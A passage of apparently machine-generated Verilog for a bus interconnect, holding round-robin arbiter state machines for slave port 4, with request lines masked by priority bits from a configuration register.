                        s4_msel_arb0_next_state = s4_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s4_msel_arb0_req[6] ) 
                        begin
                            s4_msel_arb0_next_state = s4_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s4_msel_arb0_req[7] ) 
                            begin
                                s4_msel_arb0_next_state = s4_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s4_msel_arb0_req[0] ) 
                                begin
                                    s4_msel_arb0_next_state = s4_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb0_req[1] ) 
                                    begin
                                        s4_msel_arb0_next_state = s4_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb0_req[2] ) 
                                        begin
                                            s4_msel_arb0_next_state = s4_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb0_grant4:
        begin
            if (  !( s4_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s4_msel_arb0_req[5] ) 
                begin
                    s4_msel_arb0_next_state = s4_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s4_msel_arb0_req[6] ) 
                    begin
                        s4_msel_arb0_next_state = s4_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s4_msel_arb0_req[7] ) 
                        begin
                            s4_msel_arb0_next_state = s4_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s4_msel_arb0_req[0] ) 
                            begin
                                s4_msel_arb0_next_state = s4_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s4_msel_arb0_req[1] ) 
                                begin
                                    s4_msel_arb0_next_state = s4_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb0_req[2] ) 
                                    begin
                                        s4_msel_arb0_next_state = s4_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb0_req[3] ) 
                                        begin
                                            s4_msel_arb0_next_state = s4_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb0_grant5:
        begin
            if (  !( s4_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s4_msel_arb0_req[6] ) 
                begin
                    s4_msel_arb0_next_state = s4_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s4_msel_arb0_req[7] ) 
                    begin
                        s4_msel_arb0_next_state = s4_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s4_msel_arb0_req[0] ) 
                        begin
                            s4_msel_arb0_next_state = s4_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s4_msel_arb0_req[1] ) 
                            begin
                                s4_msel_arb0_next_state = s4_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s4_msel_arb0_req[2] ) 
                                begin
                                    s4_msel_arb0_next_state = s4_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb0_req[3] ) 
                                    begin
                                        s4_msel_arb0_next_state = s4_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb0_req[4] ) 
                                        begin
                                            s4_msel_arb0_next_state = s4_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb0_grant6:
        begin
            if (  !( s4_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s4_msel_arb0_req[7] ) 
                begin
                    s4_msel_arb0_next_state = s4_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s4_msel_arb0_req[0] ) 
                    begin
                        s4_msel_arb0_next_state = s4_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s4_msel_arb0_req[1] ) 
                        begin
                            s4_msel_arb0_next_state = s4_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s4_msel_arb0_req[2] ) 
                            begin
                                s4_msel_arb0_next_state = s4_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s4_msel_arb0_req[3] ) 
                                begin
                                    s4_msel_arb0_next_state = s4_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb0_req[4] ) 
                                    begin
                                        s4_msel_arb0_next_state = s4_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb0_req[5] ) 
                                        begin
                                            s4_msel_arb0_next_state = s4_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb0_grant7:
        begin
            if (  !( s4_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s4_msel_arb0_req[0] ) 
                begin
                    s4_msel_arb0_next_state = s4_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s4_msel_arb0_req[1] ) 
                    begin
                        s4_msel_arb0_next_state = s4_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s4_msel_arb0_req[2] ) 
                        begin
                            s4_msel_arb0_next_state = s4_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s4_msel_arb0_req[3] ) 
                            begin
                                s4_msel_arb0_next_state = s4_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s4_msel_arb0_req[4] ) 
                                begin
                                    s4_msel_arb0_next_state = s4_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb0_req[5] ) 
                                    begin
                                        s4_msel_arb0_next_state = s4_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb0_req[6] ) 
                                        begin
                                            s4_msel_arb0_next_state = s4_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s4_msel_arb1_req = { ( s4_msel_req[7] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'd1 ) ), ( s4_msel_req[6] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'd1 ) ), ( s4_msel_req[5] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'd1 ) ), ( s4_msel_req[4] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'd1 ) ), ( s4_msel_req[3] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'd1 ) ), ( s4_msel_req[2] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'd1 ) ), ( s4_msel_req[1] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'd1 ) ), ( s4_msel_req[0] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s4_msel_arb1_state <= s4_msel_arb1_grant0;
        end
        else
        begin 
            s4_msel_arb1_state <= s4_msel_arb1_next_state;
        end
    end
    always @ (  s4_msel_arb1_state or  { ( s4_msel_req[7] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'd1 ) ), ( s4_msel_req[6] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'd1 ) ), ( s4_msel_req[5] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'd1 ) ), ( s4_msel_req[4] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'd1 ) ), ( s4_msel_req[3] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'd1 ) ), ( s4_msel_req[2] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'd1 ) ), ( s4_msel_req[1] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'd1 ) ), ( s4_msel_req[0] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s4_msel_arb1_next_state = s4_msel_arb1_state;
        case ( s4_msel_arb1_state ) 
        s4_msel_arb1_grant0:
        begin
            if (  !( s4_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s4_msel_arb1_req[1] ) 
                begin
                    s4_msel_arb1_next_state = s4_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s4_msel_arb1_req[2] ) 
                    begin
                        s4_msel_arb1_next_state = s4_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s4_msel_arb1_req[3] ) 
                        begin
                            s4_msel_arb1_next_state = s4_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s4_msel_arb1_req[4] ) 
                            begin
                                s4_msel_arb1_next_state = s4_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s4_msel_arb1_req[5] ) 
                                begin
                                    s4_msel_arb1_next_state = s4_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb1_req[6] ) 
                                    begin
                                        s4_msel_arb1_next_state = s4_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb1_req[7] ) 
                                        begin
                                            s4_msel_arb1_next_state = s4_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb1_grant1:
        begin
            if (  !( s4_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s4_msel_arb1_req[2] ) 
                begin
                    s4_msel_arb1_next_state = s4_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s4_msel_arb1_req[3] ) 
                    begin
                        s4_msel_arb1_next_state = s4_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s4_msel_arb1_req[4] ) 
                        begin
                            s4_msel_arb1_next_state = s4_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s4_msel_arb1_req[5] ) 
                            begin
                                s4_msel_arb1_next_state = s4_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s4_msel_arb1_req[6] ) 
                                begin
                                    s4_msel_arb1_next_state = s4_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb1_req[7] ) 
                                    begin
                                        s4_msel_arb1_next_state = s4_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb1_req[0] ) 
                                        begin
                                            s4_msel_arb1_next_state = s4_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb1_grant2:
        begin
            if (  !( s4_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s4_msel_arb1_req[3] ) 
                begin
                    s4_msel_arb1_next_state = s4_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s4_msel_arb1_req[4] ) 
                    begin
                        s4_msel_arb1_next_state = s4_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s4_msel_arb1_req[5] ) 
                        begin
                            s4_msel_arb1_next_state = s4_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s4_msel_arb1_req[6] ) 
                            begin
                                s4_msel_arb1_next_state = s4_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s4_msel_arb1_req[7] ) 
                                begin
                                    s4_msel_arb1_next_state = s4_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb1_req[0] ) 
                                    begin
                                        s4_msel_arb1_next_state = s4_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb1_req[1] ) 
                                        begin
                                            s4_msel_arb1_next_state = s4_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb1_grant3:
        begin
            if (  !( s4_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s4_msel_arb1_req[4] ) 
                begin
                    s4_msel_arb1_next_state = s4_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s4_msel_arb1_req[5] ) 
                    begin
                        s4_msel_arb1_next_state = s4_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s4_msel_arb1_req[6] ) 
                        begin
                            s4_msel_arb1_next_state = s4_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s4_msel_arb1_req[7] ) 
                            begin
                                s4_msel_arb1_next_state = s4_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s4_msel_arb1_req[0] ) 
                                begin
                                    s4_msel_arb1_next_state = s4_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb1_req[1] ) 
                                    begin
                                        s4_msel_arb1_next_state = s4_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb1_req[2] ) 
                                        begin
                                            s4_msel_arb1_next_state = s4_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb1_grant4:
        begin
            if (  !( s4_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s4_msel_arb1_req[5] ) 
                begin
                    s4_msel_arb1_next_state = s4_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s4_msel_arb1_req[6] ) 
                    begin
                        s4_msel_arb1_next_state = s4_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s4_msel_arb1_req[7] ) 
                        begin
                            s4_msel_arb1_next_state = s4_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s4_msel_arb1_req[0] ) 
                            begin
                                s4_msel_arb1_next_state = s4_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s4_msel_arb1_req[1] ) 
                                begin
                                    s4_msel_arb1_next_state = s4_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb1_req[2] ) 
                                    begin
                                        s4_msel_arb1_next_state = s4_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb1_req[3] ) 
                                        begin
                                            s4_msel_arb1_next_state = s4_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb1_grant5:
        begin
            if (  !( s4_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s4_msel_arb1_req[6] ) 
                begin
                    s4_msel_arb1_next_state = s4_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s4_msel_arb1_req[7] ) 
                    begin
                        s4_msel_arb1_next_state = s4_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s4_msel_arb1_req[0] ) 
                        begin
                            s4_msel_arb1_next_state = s4_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s4_msel_arb1_req[1] ) 
                            begin
                                s4_msel_arb1_next_state = s4_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s4_msel_arb1_req[2] ) 
                                begin
                                    s4_msel_arb1_next_state = s4_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb1_req[3] ) 
                                    begin
                                        s4_msel_arb1_next_state = s4_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb1_req[4] ) 
                                        begin
                                            s4_msel_arb1_next_state = s4_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb1_grant6:
        begin
            if (  !( s4_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s4_msel_arb1_req[7] ) 
                begin
                    s4_msel_arb1_next_state = s4_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s4_msel_arb1_req[0] ) 
                    begin
                        s4_msel_arb1_next_state = s4_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s4_msel_arb1_req[1] ) 
                        begin
                            s4_msel_arb1_next_state = s4_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s4_msel_arb1_req[2] ) 
                            begin
                                s4_msel_arb1_next_state = s4_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s4_msel_arb1_req[3] ) 
                                begin
                                    s4_msel_arb1_next_state = s4_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb1_req[4] ) 
                                    begin
                                        s4_msel_arb1_next_state = s4_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb1_req[5] ) 
                                        begin
                                            s4_msel_arb1_next_state = s4_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb1_grant7:
        begin
            if (  !( s4_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s4_msel_arb1_req[0] ) 
                begin
                    s4_msel_arb1_next_state = s4_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s4_msel_arb1_req[1] ) 
                    begin
                        s4_msel_arb1_next_state = s4_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s4_msel_arb1_req[2] ) 
                        begin
                            s4_msel_arb1_next_state = s4_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s4_msel_arb1_req[3] ) 
                            begin
                                s4_msel_arb1_next_state = s4_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s4_msel_arb1_req[4] ) 
                                begin
                                    s4_msel_arb1_next_state = s4_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb1_req[5] ) 
                                    begin
                                        s4_msel_arb1_next_state = s4_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb1_req[6] ) 
                                        begin
                                            s4_msel_arb1_next_state = s4_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s4_msel_arb2_req = { ( s4_msel_req[7] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'd2 ) ), ( s4_msel_req[6] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'd2 ) ), ( s4_msel_req[5] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'd2 ) ), ( s4_msel_req[4] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'd2 ) ), ( s4_msel_req[3] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'd2 ) ), ( s4_msel_req[2] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'd2 ) ), ( s4_msel_req[1] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'd2 ) ), ( s4_msel_req[0] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s4_msel_arb2_state <= s4_msel_arb2_grant0;
        end
        else
        begin 
            s4_msel_arb2_state <= s4_msel_arb2_next_state;
        end
    end
    always @ (  s4_msel_arb2_state or  { ( s4_msel_req[7] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[15] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[14] ) ) } == 2'd2 ) ), ( s4_msel_req[6] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[13] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[12] ) ) } == 2'd2 ) ), ( s4_msel_req[5] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[11] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[10] ) ) } == 2'd2 ) ), ( s4_msel_req[4] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[9] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[8] ) ) } == 2'd2 ) ), ( s4_msel_req[3] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[7] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[6] ) ) } == 2'd2 ) ), ( s4_msel_req[2] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[5] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[4] ) ) } == 2'd2 ) ), ( s4_msel_req[1] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[3] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[2] ) ) } == 2'd2 ) ), ( s4_msel_req[0] & ( { ( ( ( s4_msel_pri_sel == 2'd2 ) ) ? ( rf_conf4[1] ) : ( 1'b0 ) ), ( ( ( s4_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf4[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s4_msel_arb2_next_state = s4_msel_arb2_state;
        case ( s4_msel_arb2_state ) 
        s4_msel_arb2_grant0:
        begin
            if (  !( s4_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s4_msel_arb2_req[1] ) 
                begin
                    s4_msel_arb2_next_state = s4_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s4_msel_arb2_req[2] ) 
                    begin
                        s4_msel_arb2_next_state = s4_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s4_msel_arb2_req[3] ) 
                        begin
                            s4_msel_arb2_next_state = s4_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s4_msel_arb2_req[4] ) 
                            begin
                                s4_msel_arb2_next_state = s4_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s4_msel_arb2_req[5] ) 
                                begin
                                    s4_msel_arb2_next_state = s4_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb2_req[6] ) 
                                    begin
                                        s4_msel_arb2_next_state = s4_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb2_req[7] ) 
                                        begin
                                            s4_msel_arb2_next_state = s4_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb2_grant1:
        begin
            if (  !( s4_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s4_msel_arb2_req[2] ) 
                begin
                    s4_msel_arb2_next_state = s4_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s4_msel_arb2_req[3] ) 
                    begin
                        s4_msel_arb2_next_state = s4_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s4_msel_arb2_req[4] ) 
                        begin
                            s4_msel_arb2_next_state = s4_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s4_msel_arb2_req[5] ) 
                            begin
                                s4_msel_arb2_next_state = s4_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s4_msel_arb2_req[6] ) 
                                begin
                                    s4_msel_arb2_next_state = s4_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb2_req[7] ) 
                                    begin
                                        s4_msel_arb2_next_state = s4_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb2_req[0] ) 
                                        begin
                                            s4_msel_arb2_next_state = s4_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb2_grant2:
        begin
            if (  !( s4_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s4_msel_arb2_req[3] ) 
                begin
                    s4_msel_arb2_next_state = s4_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s4_msel_arb2_req[4] ) 
                    begin
                        s4_msel_arb2_next_state = s4_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s4_msel_arb2_req[5] ) 
                        begin
                            s4_msel_arb2_next_state = s4_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s4_msel_arb2_req[6] ) 
                            begin
                                s4_msel_arb2_next_state = s4_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s4_msel_arb2_req[7] ) 
                                begin
                                    s4_msel_arb2_next_state = s4_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb2_req[0] ) 
                                    begin
                                        s4_msel_arb2_next_state = s4_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb2_req[1] ) 
                                        begin
                                            s4_msel_arb2_next_state = s4_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb2_grant3:
        begin
            if (  !( s4_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s4_msel_arb2_req[4] ) 
                begin
                    s4_msel_arb2_next_state = s4_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s4_msel_arb2_req[5] ) 
                    begin
                        s4_msel_arb2_next_state = s4_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s4_msel_arb2_req[6] ) 
                        begin
                            s4_msel_arb2_next_state = s4_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s4_msel_arb2_req[7] ) 
                            begin
                                s4_msel_arb2_next_state = s4_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s4_msel_arb2_req[0] ) 
                                begin
                                    s4_msel_arb2_next_state = s4_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s4_msel_arb2_req[1] ) 
                                    begin
                                        s4_msel_arb2_next_state = s4_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s4_msel_arb2_req[2] ) 
                                        begin
                                            s4_msel_arb2_next_state = s4_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s4_msel_arb2_grant4:
        begin
            if (  !( s4_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s4_msel_arb2_req[5] ) 
                begin
                    s4_msel_arb2_next_state = s4_msel_arb2_grant5;
                end
                else
                begin 
